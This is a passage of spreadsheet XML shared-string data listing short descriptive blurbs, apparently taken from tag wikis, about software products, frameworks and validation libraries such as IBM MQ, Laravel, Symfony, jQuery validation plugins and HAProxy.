Command Monitoring in the asynchronous driver (support in the synchronous driver was added in a previous release)
Additional query parameters in the connection string
GridFS in the asynchronous driver
Additional configuration options for GSSAPI authentication.</t>
  </si>
  <si>
    <t>Webapp is the easiest way to develop the application from
scratch
security support (users, groups support, access to components,
services, operations, widgets, and more);
Staff supports the deployment of services in the form of shared libraries, and in the form of executable files.</t>
  </si>
  <si>
    <t>Links to everything you need to get up and running with IBM MQ:  
IBM MQ Advanced for Developers - full-featured, no-charge, no support development license includes both server and client code, Managed File Transfer, Advanced Message Security and MQ Extended Reach (called MQXR internally, a.k.a.</t>
  </si>
  <si>
    <t>Chart FX provides developers with unprecedented data visualization capabilities taking full advantage of the .NET or Java Server Framework and cutting-edge technologies such as AJAX to create visually-rich, lightweight and secure charts that will enhance your enterprise application's display layer.</t>
  </si>
  <si>
    <t>jQuery.validity is a jQuery plugin for powerful, accurate client-side form validation.</t>
  </si>
  <si>
    <t>The built-in validators and sanitizers are provided by the JavaScript library validator, but support for extending the middleware with custom validators and/or sanitizers is also available.</t>
  </si>
  <si>
    <t>jQuery Validation Engine is a jQuery plugin related to client-side HTML form-field validation and validation-error-notification.The plugin provides visually appealing prompts that grab user attention on the subject matter.</t>
  </si>
  <si>
    <t>Links to everything you need to get up and running with IBM MQ:
IBM MQ Advanced for Developers - full-featured, no-charge, no support development license includes both server and client code, Managed File Transfer, Advanced Message Security and MQ Extended Reach (called MQXR internally, a.k.a.</t>
  </si>
  <si>
    <t>Chrome Developer Tools features include:
Device Mode: emulates various screen sizes
Elements Panel: HTML/CSS analysis
Console Panel: command line and diagostics
Sources Panel: debugger
Network Panel: page load performance
Performance Panel: runtime performance
Memory Panel: memory issues
Application Panel: resource monitor
Security Panel: security issues
Useful Links:
Official DevTools Documentation
DevTools Videos
Links on GitHub
The Breakpoint series: Episode 1, Episode 2, Episode 3, Episode 4, Episode 5, Episode 6, Episode 7, Episode 8</t>
  </si>
  <si>
    <t>Features:
Chainable message builder
Persistent connection management
APN feedback service integration
Feature complete mock agents for local-only testing/development
For more visit:- apnagent</t>
  </si>
  <si>
    <t>About
Aspose.Pdf for .NET is affordable and offers an incredible wealth of features including PDF compression options; table creation and manipulation; support for graph objects; extensive hyperlink functionality; extended security controls; custom font handling; integration with data sources; add or remove bookmarks; create table of contents; add, update, delete attachments and annotations; import or export PDF form data; add, replace or remove text and images; split, concatenate, extract or inset pages; transform pages to image; print PDF documents and much more.</t>
  </si>
  <si>
    <t>Reasons to use multiple filegroups include:
Larger storage capacity
Better performance by distributing requests to multiple drives
Additional security options
Drawbacks include:
Restore, backups, and disaster recovery can be more complicated
Additional programming to make sure that all filegroups are used
See File and Filegroups Architecture at MSDN for more information and examples.</t>
  </si>
  <si>
    <t>JEE8 incorporates features of previous versions and adds:
Java Servlet 4.0 API with HTTP/2 support
Enhanced JSON support including a new JSON binding API
A new REST Reactive Client API
Asynchronous CDI Events
A new portable Security API
Server-Sent Events support (Client &amp; Server-side)
Support for Java SE 8 new capabilities (e.g.</t>
  </si>
  <si>
    <t>Oracle RDB
"Oracle Rdb is a full-featured, relational database management system for mission-critical applications on OpenVMS platforms....
Oracle Rdb's technical strengths include:
Very high performance to deliver extraordinary real-world throughput
Extremely high reliability, providing both data security and database uptime
Extremely high availabilityrequirements for scheduled maintenance downtime are minimal
Easy maintainability
Low cost per transaction"
via Rdb product page
perl RDB
There is a flat file database offering built on perl known as the perl RDB</t>
  </si>
  <si>
    <t>Backand provides all of the features necessary for a fully functional, secure, and scalable web app, including user and role-based security, automated RESTful-based APIs, custom action triggers, portable Amazon RDS database instances, social media integration, and extensive support for server-side JavaScript code..</t>
  </si>
  <si>
    <t>Use the [html-validation] tag for questions about client-side form validation in browsers, as defined in https://html.spec.whatwg.org/multipage/forms.html#client-side-form-validation.</t>
  </si>
  <si>
    <t>It supports themes for validation messages, various validation functions, validation of dynamic forms, server side validation and more.</t>
  </si>
  <si>
    <t>jQuery Form Validator by Victor Jonsson is a feature rich jQuery plugin that makes it easy to validate user input while keeping your HTML markup clean from JavaScript code.</t>
  </si>
  <si>
    <t>HTML5 Validation refers to the constraint-validation engine in HTML5 which allows easy validation of forms.</t>
  </si>
  <si>
    <t>The framework is supposed to extensive use of the XWork validators to support server-side and client-side validation.</t>
  </si>
  <si>
    <t>This form validation jQuery plugin allow syou to make quick validation using many validation rules.</t>
  </si>
  <si>
    <t>Key features:
Support for a wide range of different Instant Messaging services
Tabbed chat windows
Mac OS X integration
Address Book integration
WebKit Message View: Theme your chat windows
Combined Contacts: Merge your contacts so that each one represents a person, not an account
A sophisticated events system (including Growl notifications)
OTR Encryption
File Transfer
Xtras and many, many other customization options
Translations: Adium speaks 27 different languages
Official site.</t>
  </si>
  <si>
    <t>XWiki Enterprise, the enterprise wiki edition, includes WYSIWYG editing, OpenOffice based document import/export, semantic annotations and tagging, and advanced permissions management.</t>
  </si>
  <si>
    <t>DataStax Enterprise Graph is a scalable, enterprise-ready graph database capable of storing and querying graphs with billions of elements while providing enterprise features such as security, monitoring, advanced management, encryption and 24/7 support.</t>
  </si>
  <si>
    <t>The Struts 2 Full Hibernate Plugin provides Hibernate Validator integration, Hibernate Core Sessions injection capability, Transactions injection capability and Hibernate Core configuration management Web Tool.</t>
  </si>
  <si>
    <t>It runs as a windows service only and allows for the handling of a wide variety of tasks such as backup automation, database replication setup, job scheduling, user permissions and database monitoring.</t>
  </si>
  <si>
    <t>Declarative authorization benefits include:
easier to audit
easier to maintain
Other means to achieve externalized authorization include policy-based xacml.</t>
  </si>
  <si>
    <t>NTFS has several improvements over FAT and HPFS such as improved support for metadata and the use of advanced data structures to improve performance, reliability, and disk space utilization, plus additional extensions such as security access control lists (ACL) and file system journaling.</t>
  </si>
  <si>
    <t>Fivestar is an officially supported module in Acquia Drupal that features:
jQuery rollover effects and AJAX no-reload voting
Configurable star sets
Graceful degradation to an HTML rating form when JavaScript is turned off
Support for anonymous voters</t>
  </si>
  <si>
    <t>DevOps integration targets product delivery, quality testing, feature development, and maintenance releases in order to improve reliability and security and provide faster development and deployment cycles.</t>
  </si>
  <si>
    <t>Although implementations exist that work directly with schematron schemas, the canonical model is to first transform the schema into an xslt style sheet using stylesheets available at the schematron home page which can then be used to validate the input document by transforming it into Schematron Validation Report Language (SVRL), a language used for reporting the results of a schematron validation.</t>
  </si>
  <si>
    <t>That means API apps share with web apps all the web hosting features of the Azure App Service platform:
Automatic OS patching
Enterprise grade security
High availability
Auto scaling and load balancing
WebJobs for background processing
Quick and easy deployment, and many continuous delivery options</t>
  </si>
  <si>
    <t>These includes:
User and Role-based Security
Dedicated Hosting
Custom server-side actions
Transaction-level database-triggered actions
Integration with Ionic for cross-platform apps
Server-side JavaScript execution, allowing for safe and secure third-party integration
A portable database, allowing you to quickly change providers
Real-time database communication, and web sockets
Scalability, both in terms of performance and data management.</t>
  </si>
  <si>
    <t>Fluent Validation is an ASP.NET MVC integrated validation framework that allows the developer to set validation rules using expressions.</t>
  </si>
  <si>
    <t>For Server side validation of form we can sub class any FormBean with DynaValidatorForm class and for client side validation we can do it using validation-rules.xml with javascript functions enclosed.</t>
  </si>
  <si>
    <t>Usergrid provides most common services required for building apps, such as user registration &amp; management, data storage, file storage, roles and permissions, and features sql-like syntax for running queries, with full property indexing, full text search, and geolocation search.</t>
  </si>
  <si>
    <t>The main features are
Very easy installation
No need to hack configuration files, SCM-Manager is completely configurable from its Web-Interface
No Apache and no database installation is required
Central user, group and permission management
Out of the box support for Git, Mercurial and Subversion
Full RESTFul Web Service API (JSON and XML)
Rich User Interface
Simple Plugin API
Useful plugins available (e.g.</t>
  </si>
  <si>
    <t>Including:
Versatile content ingestion options from any device and IP enabled camera
High Availability, mission critical Video Management System and Applications, featuring content management, robust search capabilities and mobile apps
High performance encoding, support all video, audio, image formats and codecs
Industry standards security for systems, content and delivery used and certified by banks, governments, insurance organizations, universities, telecommunications operators and global enterprises including Bank of America, IBM, Oracle, Intel, SAP, AT&amp;T, Philips, HBO, ABC, and many others
Flexible metadata, schema and catalog management
Robust publishing, distribution and media repurposing management
State of the art customizable cross-platform web standards media player with APIs and plugin ecosystem and the fastest load times in the market today
Secure and controlled delivery management mechanism, including smart local-network and remote-network storage management capabilities
Granular Access Control and End-User Entitlements system
Detailed large-scale analytics (For Audience Measurement, Media Analytics, BI)
And much more... (For full list of the Kaltura Video Platform Features)
Learn more:
Visit the Knowledge Center: http://knowledge.kaltura.com/
Watch Kaltura Videos: http://videos.kaltura.com/
Start a FREE trial: http://corp.kaltura.com/free-trial
Kaltura on GitHub: https://github.com/kaltura/
Install via RPM/deb: https://github.com/kaltura/platform-install-packages</t>
  </si>
  <si>
    <t>For example, the interception feature provided by Unity, which you can use to capture calls to objects and add additional functionality and policies to the target objects, is implemented as a container extension.</t>
  </si>
  <si>
    <t>mbed TLS (formerly known as PolarSSL) makes it trivially easy for developers to include cryptographic and SSL/TLS capabilities in their (embedded) products, facilitating this functionality with a minimal coding footprint.</t>
  </si>
  <si>
    <t>Automated error-logging is a humble form of reporting; "Business intel" suggests a sophisticated and multi-layered form.</t>
  </si>
  <si>
    <t>For business applications, data validation can be defined through declarative data integrity rules, or procedure-based business rules.</t>
  </si>
  <si>
    <t>There is also a comprehensive protection and licensing support for ASP.NET, Silverlight, Compact Framework (2.0 and 3.5) and Mono.</t>
  </si>
  <si>
    <t>System Requirements: PHP 5.3.0 or newer
Features:
Powerful router    
Template rendering with custom views
Flash messages
Secure cookies with AES-256 encryption
HTTP caching
Logging with custom log writers
Error handling and debugging
Middleware and hook architecture
Simple configuration</t>
  </si>
  <si>
    <t>What is new:
Auth scaffolding
Implicit model binding
Laravel Scheduler is now able to append output from scheduled tasks
Form array validation
Collections wildcards
Database session driver
MySQL JSON column types
Middleware groups
Bind injection values
Resources:
Laravel 5.2 release notes
Upgrade guide for Laravel 5.2
Overview of new Laravel 5.2 features and changes on Laravel News
What's new in Laravel 5.2 on Laracasts</t>
  </si>
  <si>
    <t>The following list gives an overview of some of the things that can be customized or extended with HK2:
Custom scopes
The use of proxies
Custom injection resolution
Assisted injection
Just In Time injection resolution
Custom validation and security
Run Level Services</t>
  </si>
  <si>
    <t>It provides easy-to-use interfaces to over 50 corpora and lexical resources such as WordNet, along with a suite of text processing libraries for classification, tokenization, stemming, tagging, parsing, and semantic reasoning.</t>
  </si>
  <si>
    <t>It includes profile support, OAuth integration, works with OWIN, and is included with the ASP.NET templates shipped with Visual Studio 2013.</t>
  </si>
  <si>
    <t>Some topics that can be asked are:
DOS Development Under Windows  
Automatic Build And Make  
The Debugger
Form And Menu Editors
Graphics-Mode Support
Mouse support
Protected-Mode Development
The enhancements/extensions added.</t>
  </si>
  <si>
    <t>Characteristics
Strong support for non-linear development
Distributed development
Compatibility with existing systems/protocols
Efficient handling of large projects
Cryptographic authentication of history
Toolkit-based design
Pluggable merge strategies
Garbage accumulates unless collected
Periodic explicit object packing
Data Assurance 
Data structures
External Links
Pro Git by Scott Chacon (free)
Recommended chapters for beginners: 1-3, 6-6.5.</t>
  </si>
  <si>
    <t>Apache Continuum is an enterprise-ready continuous integration server with features such as automated builds, release management, role-based security, and integration with popular build tools and source control management systems.</t>
  </si>
  <si>
    <t>There are also Professional and Enterprise Editions that add deeper workflow and other security enhancements over the community edition.</t>
  </si>
  <si>
    <t>Therefore 5 schemes would suffice)
Registry Database - /dbscripts/
User Manager Database - /dbscripts/
APIM Database - /dbscripts/apimgt/
CDM Database - /dbscripts/cdm/
Certificate Mgt Database - /dbscripts/certMgt/
Android Database - /dbscripts/cdm/plugins/android
iOS Database - /dbscripts/cdm/plugins/ios
Windows Database - /dbscripts/cdm/windows
APP Manager Database - /dbscripts/appmgt/
Store Database - /dbscripts/storage/
Social Database -  /dbscripts/social/
Databases are configured as following.</t>
  </si>
  <si>
    <t>Since the code base is common, it automatically comes with most of the technical, security, management and administrative features new to Windows Vista such as the rewritten networking stack (native IPv6, native wireless, speed and security improvements); improved image-based installation, deployment and recovery; improved diagnostics, monitoring, event logging and reporting tools; new security features such as BitLocker and ASLR (address space layout randomization); improved Windows Firewall with secure default configuration; .NET Framework 3.0 technologies, specifically Windows Communication Foundation, Microsoft Message Queuing and Windows Workflow Foundation; and the core kernel, memory and file system improvements.</t>
  </si>
  <si>
    <t>This includes:
submission of notification messages by other apps 
notification messages on signing in 
notification messages via email (configurable by user) 
notification messages via feed</t>
  </si>
  <si>
    <t>It introduces a host of new features, including powerful new aggregations to do more analytics, cluster state diffs to support even larger clusters, compatibility with 2.0 versions of Shield (security), Marvel (monitoring), Watcher (alerts), and more.</t>
  </si>
  <si>
    <t>Living on the edge
There are a set of interesting links on the symfony blog about what's new in this version:
PHPUnit Bridge
VarDumper improvements
Form and Validator Updates
Dependency Injection Improvements
Choice form type refactorization
Productivity improvements
the new Asset component
Security Improvements
Twig Profiler
Serializer Component Improvements
Translation Profiler
Default Date and Number Format Configuration
Advanced table layouts for console commands
Twig as a First-Class Citizen
Serialization Groups
Inherited security roles in the web profiler</t>
  </si>
  <si>
    <t>Features:
Managing User Profiles
Support for creating custom fields / properties for user profiles
User authentication and authorization (OAuth support available)
Integration with services like Facebook and LinkedIn
Integrated payment processing, including recurring payments
Managing payment plans and subscriptions
SDKs available for:
Android
JavaScript
JavaScript/AngularJS
JavaScript/Ember.js
PhoneGap
Node.js
Node.js/Passport
Python
Python/Tornado
Ruby
PHP
Java
.NET/C#</t>
  </si>
  <si>
    <t>Simply install and configure Docker Trusted Registry through the web admin console, integrate to your preferred storage, authenticate to your Active Directory / LDAP services and integrate into key software development workflows like Continuous Integration (CI) and Continuous Delivery (CD).</t>
  </si>
  <si>
    <t>Living on the edge
There are a set of interesting links on the symfony blog about what's new in this version:
Validator information in the Symfony profiler
Stopwatch improvements
Lazy commands
Prefix all controller route names
Added support for XLIFF 2.0 notes
Improved security listeners
User impersonation improvements
Better console exceptions
Groups support for the Valid constraint
HTTP Immutable Responses
Deprecate configuration options
Subscribing to events in the micro kernel
Improved comparison constraints
Advanced environment variables
PHP-based configuration for services and routes
Better code coverage reports
Deprecated bundle inheritance
Default request context for assets
Argon2i password hasher
Bootstrap 4 form theme
Defining compiler passes in the kernel
Form improvements
Simpler injection of tagged services
Improved the overriding of templates
Minimalist PSR-3 logger</t>
  </si>
  <si>
    <t>The Unity Application Block (Unity) is a lightweight, extensible dependency injection container for .NET with support for interception.</t>
  </si>
  <si>
    <t>jQuery.validity is an elegant and powerful jQuery plug-in you can use to setup client-side form validation.</t>
  </si>
  <si>
    <t>Some of the features include: 
Connect to any XMPP server
Supports TLS encryption
Several XML processing approaches and supported styles
In XMPPHP, the main processing is done by XMLStream.php.</t>
  </si>
  <si>
    <t>It introduces new features in comparison to the Java SE v6 including dynamic language support, compressed pointers, small language extensions, elliptic curve cryptography, new network protocols and various system library extensions.</t>
  </si>
  <si>
    <t>It has the following features :
Comprehensive HTTP coverage
Parameter coercion, automatic Swagger support
Async foundation based on manifold
Protocol extensibility</t>
  </si>
  <si>
    <t>The features of ZFS include protection against data corruption, support for high storage capacities, efficient data compression, integration of the concepts of filesystem and volume management, snapshots and copy-on-write clones, continuous integrity checking and automatic repair, RAID-Z and native NFSv4 ACLs.</t>
  </si>
  <si>
    <t>Other features include:
A new Date &amp; Time API
A new Stream API integrated into the Collections API
Project Nashorn, a JavaScript runtime which allows developers to embed JavaScript code within applications
A standard API for performing Base64 encoding and decoding
Stronger integration with JavaFX
Annotations on Java types
Although it was initially advertised to be launched in September 2013, the release was pushed to March 2014 due to security issues.</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Auditing provides a comprehensive audit trail of user and system-initiated events covering every aspect of builds, promotions, executions, deployments, and administration.</t>
  </si>
  <si>
    <t>Features:
On the spot validation
Fully adaptive (adapts to the container, no css media queries needed)
Keyboard support
Custom checkboxes, radios and file inputs
Custom seamless jQuery UI datepicker
Support for third party extensions
Localization
Home: https://github.com/elclanrs/jq-idealforms</t>
  </si>
  <si>
    <t>In particular, Yii supports the following features about RESTful APIs:
Quick prototyping with support for common APIs for Active Record;
Response format negotiation (supporting JSON and XML by default);
Customizable object serialization with support for selectable output fields;
Proper formatting of collection data and validation errors;
Support for HATEOAS;
Efficient routing with proper HTTP verb check;
Built-in support for the OPTIONS and HEAD verbs;
Authentication and authorization;
Data caching and HTTP caching;
Rate limiting;</t>
  </si>
  <si>
    <t>Zeek is a network analysis framework - implemented as a domain specific programming language to enable users to create powerful network security monitoring (NSM) capabilities while also providing a comprehensive platform for general network traffic analysis.</t>
  </si>
  <si>
    <t>Spidermon makes it easy to validate data, monitor spider statistics and send notifications to everyone when things don't go well in an easy and extensible way.</t>
  </si>
  <si>
    <t>HAproxy is a TCP/HTTP load balancer which provides cookie-based persistence, advanced traffic regulation with surge protection, automatic failover, run-time regex-based header control, Web-based reporting, advanced logging to help trouble-shooting buggy applications and/or networks, and a few other features.</t>
  </si>
  <si>
    <t>Bulbs supports the Gremlin query language and Neo4j's Cypher query language, and it has built-in support for three graph-database servers: Rexster, Neo4j Server, and Titan.</t>
  </si>
  <si>
    <t>Pluggable application
The default authentication and storage can be changed using plugins, furthermore, adding additional layers is fairly easy using the middleware plugins.</t>
  </si>
  <si>
    <t>The NoSQL Database links with the customer application, providing access to the data via the appropriate storage node for the requested key-value:
The NoSQL Database intelligent driver includes the hashing algorithms to ensure proper data distribution, as well as state and performance information about each storage node which enable it to provide optimal load balancing and query processing.</t>
  </si>
  <si>
    <t>Instead of writing validation manually or balancing some unwieldy server-side framework, validity allows you to design client-side validation in a manner that feels natural and straightforward.</t>
  </si>
  <si>
    <t>Database plan usually start with Third normal form (3NF) enforced with referential integrity (RI) constraints and the selectively deviate to Second normal form (2NF) when necessary to boost performance.</t>
  </si>
  <si>
    <t>Feature Overview:
Dynamic form validation
Cross-browser
Built-in validators for the most common cases
Allows you to craft your own validators
Allows you to create remote (ajax) validators
Provides events so you can customize you validation process as much as possible
Documentation &amp; Links
Parsley 2.0 Documentation
Website
GitHub Project
Parsley 1.0 Documentation</t>
  </si>
  <si>
    <t>Features
Offline capability: when the cloud's not there, your app will be - flexible data synchronization
Multi-platform: runs anywhere with CouchDB (Windows, OSX, Linux, Android and iOS)
Deployment: effortless to deploy, to the cloud or local machines, promoting quick iterations
Keep your data yours: now you can keep sensitive data in-house, and avoid sharing it with cloud services
Real-time: add live page updates from multiple users with the built-in changes feed
Scalability: easily grow from hobby-project to high-demand app with CouchDB
Easy to distribute: apps are easy to share and distribute, between people and servers
One language to rule them all: with just CouchDB and the browser, all you need to speak is JavaScript!</t>
  </si>
  <si>
    <t>Supports multiple root directories
Can be used with Local file storage, MySQL database or FTP volumes
Easy integration with web editors (elRTE, CKEditor, TinyMCE)
3rd party connectors
Flexible configuration of access rights, upload file types, user interface and other
Extensibility (you can create as many commands as you wish)
Project History
elFinder was created by Studio-42 in 2009.</t>
  </si>
  <si>
    <t>Highlights include:
Java API with source code and unit tests;
multi-lingual, multi-domain, multi-genre models;
training with new data for new tasks;
n-best output with statistical confidence estimates;
online training (learn-a-little, tag-a-little);
thread-safe models and decoders for concurrent-read exclusive-write (CREW) synchronization; and
character encoding-sensitive I/O.</t>
  </si>
  <si>
    <t>Features include:
Sendmail compatible interface (command line options and exit codes)
Support for multiple accounts
TLS/SSL support including client certificates
Many authentication methods
Support for Internationalized Domain Names (IDN)
Fast SMTP implementation using command pipelining
DSN (Delivery Status Notification) support
SOCKS proxy support
msmtp is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version.</t>
  </si>
  <si>
    <t>Its' main features are :
Create trial versions of your software
Set an expiration date
Limit use to a fixed number of days after installation
Limit by number of executions
Limit the use of each invocation to a set number of minutes
Limit the use of your software to a total number of minutes
Custom locks - Allows you to implement custom trial limitations
Easily turn your trial version into a fully licensed version using license files
Lock license files to a specific machine via Hardware ID
Lock license files to specific assembly attributes (company name, assembly version...)
Embedded license files.</t>
  </si>
  <si>
    <t>The code is checked against configurable sets of rules, notably MISRA rules (which restrict features of the C language which are deemed unsafe) and code quality metrics (like cyclomatic complexity).</t>
  </si>
  <si>
    <t>It also has advanced features such as full-text search via integration with lucene and integrity constraints.</t>
  </si>
  <si>
    <t>Protected mode was first added to the x86 architecture in 1982, with the release of Intel's 80286 processor, and later extended with the release of the 80386 processor in 1985.</t>
  </si>
  <si>
    <t>Abide is a form validation library that extends the HTML5 validation API with custom validators.</t>
  </si>
  <si>
    <t>Audit4j is more focussed on business audit events however it also can be used to capture system audit events through extensions.</t>
  </si>
  <si>
    <t>Main features and benefits:
Monitor all deployed applications, adapters and push notification rules from a centralized, web-based console
Assign device-specific IDs to ensure secure application provisioning
Remotely disable applications based on preconfigured rules of app version and device type
Customize messages sent to end-users on application launch
Collect user statistics from all running applications
Generate built-in, pre-configured user adoption and usage reports
Simulate many different devices through embedded mobile browser simulator</t>
  </si>
  <si>
    <t>Grails applications are mainly written in groovy, a dynamic language with strong interoperability with Java and features similar to other languages ruby, python, and smalltalk
Along with its core, Grails has a plugin architecture and library that can provide developers with common web application features like security and dynamic UI tools.</t>
  </si>
  <si>
    <t>Business applications tend to have the following key features in common:
The ability to access and maintain data in a central data store
A Client/server architecture
A workflow providing a structured means of entering/modifying data
A user interface providing an efficient means of entering/modifying data
Business rules
Data validation rules
The ability to obtain information from the system (via reports)
Authentication and authorization of users
more on wikipedia</t>
  </si>
  <si>
    <t>It provides easy-to-use interfaces to over 50 corpora and lexical resources such as WordNet, along with a suite of text processing libraries for classification, tokenization, stemming, tagging, parsing, and semantic reasoning, and providing wrappers for industrial-strength NLP libraries.</t>
  </si>
  <si>
    <t>A sample of other features include SSL and TLS support (mod_ssl), a proxy module (mod_proxy), a URL rewriter (also known as a rewrite engine, implemented under mod_rewrite), custom log files (mod_log_config), and filtering support (mod_include and mod_ext_filter).</t>
  </si>
  <si>
    <t>The Firebase Security API uses a flexible authentication system and an expression-based rules language to provide a very flexible security model.</t>
  </si>
  <si>
    <t>Modern business applications consist of custom business objects and components that perform specific or generic tasks within the application, in addition to components that individually address cross cutting concerns such as logging, authentication, authorization, caching, and exception handling.</t>
  </si>
  <si>
    <t>Powered by the Interception mechanism built into Unity, this application block can be used to implement interception policies to streamline the implementation of common features, such as logging, caching, exception handling, and validation, across a system.</t>
  </si>
  <si>
    <t>A data governance solution for Apache Hadoop offering features such as data discovery, continuous optimization, audit, lineage, metadata management, and policy enforcement.</t>
  </si>
  <si>
    <t>Highlights:
easy to use
optional parts anywere in the mask
possibility to define aliases which hide complexity
date / datetime masks
numeric masks
lots of callbacks
non-greedy masks
many features can be enabled/disabled/configured by options
supports readonly/disabled/dir="rtl" attributes
support data-inputmask attribute  
multi-mask support  
regex-mask support
Usage:
Include the js-files which you can find in the dist-folder.</t>
  </si>
  <si>
    <t>JEMH is an enterprise message handler for jira, providing a scalable email handling and routing, auditing, incoming mail "fixing" on the fly, customized notification templates by project, support for email only users, integrated test case facilities, auditing, configuration export/import and more.</t>
  </si>
  <si>
    <t>Regula is an annotation-based form-validation library for client-side validation written in JavaScript</t>
  </si>
  <si>
    <t>It also includes business runtime governance requirements through its interoperability with well-known external monitoring and reporting applications.</t>
  </si>
  <si>
    <t>Features
The framework provides several components: an ORM, a form system, a template engine, an event system, an authentication, a rights management...</t>
  </si>
  <si>
    <t>Regula is an annotation-based form-validation library for client-side validation written in JavaScript.</t>
  </si>
  <si>
    <t>Microsoft ships PreEmptives Dotfuscator Community Edition to provide .NET Obfuscation inside Visual Studio, but there is also a Professional Edition with much stronger protection that is widely used.</t>
  </si>
  <si>
    <t>Advanced Excel features are supported, including multi-threaded recalculation (Excel 2007 and later), registration-free RTD servers (Excel 2002 and later) and customized Ribbon interfaces (Excel 2007 and 2010).</t>
  </si>
  <si>
    <t>authentication, ARDBC, Filter-Plugins)
Today Remedy is most likely to be running the IT Service Management suite which includes: 
Help Desk Incident Management, Service Request Management, Problem Management, etc
Change Management Includes Task Management and Release Management
Asset Management 
CMDB for managing configuration items
SLM for setting and measuring Service Targets and KPIs
Related tags
itsmcmdbasset</t>
  </si>
  <si>
    <t>Data is automatically partitioned so each server contains only a subset of the total data
Provides tunable consistency (strict quorum or eventual consistency)
Server failure is handled transparently
Pluggable Storage Engines -- BDB-JE, MySQL, Read-Only
Pluggable serialization -- Protocol Buffers, Thrift, Avro and Java Serialization
Data items are versioned to maximize data integrity in failure scenarios without compromising availability of the system
Each node is independent of other nodes with no central point of failure or coordination
Good single node performance: you can expect 10-20k operations per second depending on the machines, the network, the disk system, and
  the data replication factor
Support for pluggable data placement strategies to support things like distribution across data centers that are geographically far
  apart.</t>
  </si>
  <si>
    <t>Fluent Validation is an open-source, ASP.NET MVC / ASP.NET Core integrated validation framework that allows the developer to set validation rules using expressions.</t>
  </si>
  <si>
    <t>It enables the WebLogic Server to use Spring Framework performing JSR-250 dependency injection, annotation processing and EJB 3.0-style interception.</t>
  </si>
  <si>
    <t>These constraints are generally expressed using some combination of grammatical rules governing the order of elements, Boolean predicates that the content must satisfy, data types governing the content of elements and attributes, and more specialized rules such as uniqueness and referential integrity constraints.</t>
  </si>
  <si>
    <t>INotifyDataErrorInfo is an interface in .Net Framework which defines members that data entity classes can implement to provide custom synchronous and asynchronous validation support.</t>
  </si>
  <si>
    <t>Features:
Full SOAP Client capability and mock-up SOAP server capability
Handles both RPC and Document styles
Handles both SOAP 1.1 and SOAP 1.2 Fault
APIs to parse XML into JSON and JSON into XML
API to describe WSDL document
Support for both synchronous and asynchronous method handlers
WS-Security (currently only UsernameToken and PasswordText encoding is supported)</t>
  </si>
  <si>
    <t>Automated Recurring Billing (ARB) is a tool developed by Authorize.Net that allows for the creation of "subscriptions" that includes the customer's payment information, billing amount, and a specific billing interval and duration.</t>
  </si>
  <si>
    <t>Quality and Strength
A robustness at all levels:
Security first : in forms, authentication...
An advanced errors management, and following used protocols
Thousand unit tests on Jelix components
PHPUnit or Simpletest integration for your own tests
Deployment
A quick and easy deployment thanks to the installation and update system of Jelix.</t>
  </si>
  <si>
    <t>A recipe:
Is authored using Ruby, which is a programming language designed to read and behave in a predictable manner
Is mostly a collection of resources in a Ruby syntax with some helper code around it
Must define everything that is required to configure part of a system
Must be stored in a cookbook
May be included in a recipe
May use the results of a search query and read the contents of a data bag (including an encrypted data bag)
May have a dependency on one (or more) recipes
May be tagged to facilitate the creation of arbitrary groupings that exist outside of the normal naming conventions an organization may have
Must be added to a run-list before it can be used by the chef-client
Is always executed in the same order as listed in a run-list</t>
  </si>
  <si>
    <t>Support for most Blueprints features including key indices and threaded transactions
ACID guarantees on transactions
Designed for multi-threaded OLTP applications
Implements optimistic concurrency control
Data stored in readable text files
Serialization using the Jackson JSON processor
Recovers cleanly from power failures and crashes provided the underlying file system supports metadata journaling, like NTFS, ext3, ext4, XFS and JFS (not FAT32 or ext2)
High read and write throughputs in multi-threaded environments
Supports online backups through a JMX interface</t>
  </si>
  <si>
    <t>Its design and simplicity focus offers an unparalleled suite of productivity features that can be declaratively enabled 
without code, from creating fully queryable Web API's with just a single Typed Request DTO with
Auto Query supporting 
every major RDBMS 
to the built-in support for
Auto Batched Requests 
or effortlessly enabling rich HTTP Caching and
Encrypted Messaging 
for all your existing services via Plugins.</t>
  </si>
  <si>
    <t>Its features include (but are not limited to) live chat, video conference, screensharing, file uploads, role-based permissions, native apps, internationalized UI, rich media, notifications, integrations to hubot and webhooks, full-text and regex search within history, several text decorators such as markdown, KaTeX, emojis and much more.</t>
  </si>
  <si>
    <t>By plugging into Passport, Freshbooks authentication can be easily and unobtrusively integrated into any application or framework that supports Connect-style middleware, including Express.</t>
  </si>
  <si>
    <t>The rules may be implemented through the automated facilities of a data dictionary, or by the inclusion of explicit application program validation logic.</t>
  </si>
  <si>
    <t>Features include
Web API
distributed command execution
pluggable execution system (SSH by default)
multi-step workflows
job execution with on demand or scheduled runs
graphical web console for command and job execution
role-based access control policy with support for LDAP/ActiveDirectory
history and auditing logs
open integration to external host inventory tools
command line interface tools
Resources
Official homepage
Rundeck's Github page
Documentation and API reference 
Mailing list
IRC channel: irc://irc.freenode.net/rundeck</t>
  </si>
  <si>
    <t>Through advanced metadata systems, WSRR enables enterprises to manage applications, services, and service consumers in order to apply consistent operational policies and enforce lifecycle governance.</t>
  </si>
  <si>
    <t>HAProxy is a TCP/HTTP load balancer which provides cookie-based persistence, advanced traffic regulation with surge protection, automatic fail over, run-time regex-based header control, Web-based reporting, advanced logging to help trouble-shooting buggy applications and/or networks, and a few other features.</t>
  </si>
  <si>
    <t>New features included in Safari 6 include:
Unified Smart Search Field
Tab View
iCloud Tabs
Integrated sharing menu for email, iMessage and Twitter (Facebook coming Fall 2012)
Better Privacy
Offline ReadingList
Developer Features
Improvements for Chinese Users
See a full description if features at http://www.apple.com/safari/
Safari 6 is currently only available for OS X Lion (10.7), Mountain Lion (10.8) and is currently not available for Windows.</t>
  </si>
  <si>
    <t>Benefits
Cluster Management Made Easy
Flexible Scheduling
Performance at Scale
Security
Extensible</t>
  </si>
  <si>
    <t>FoundationDB is a new-generation database built to support a diverse set of applications and data models while delivering exceptional performance, data consistency, and operational resilience.</t>
  </si>
  <si>
    <t>Laravel ships with a simple, convenient facility for validating data and retrieving validation error messages via the Validation class.</t>
  </si>
  <si>
    <t>It is a simple to use configuration-centric framework with built-in support for input validation, caching, authentication, and other essential facilities.</t>
  </si>
  <si>
    <t>By default, Laravel's base controller class uses a ValidatesRequests trait which provides a convenient method to validate incoming HTTP request with a variety of powerful validation rules.</t>
  </si>
  <si>
    <t>ODP.NET allows developers to take advantage of advanced Oracle database functionality, including Real Application Clusters, XML DB, and advanced security.</t>
  </si>
  <si>
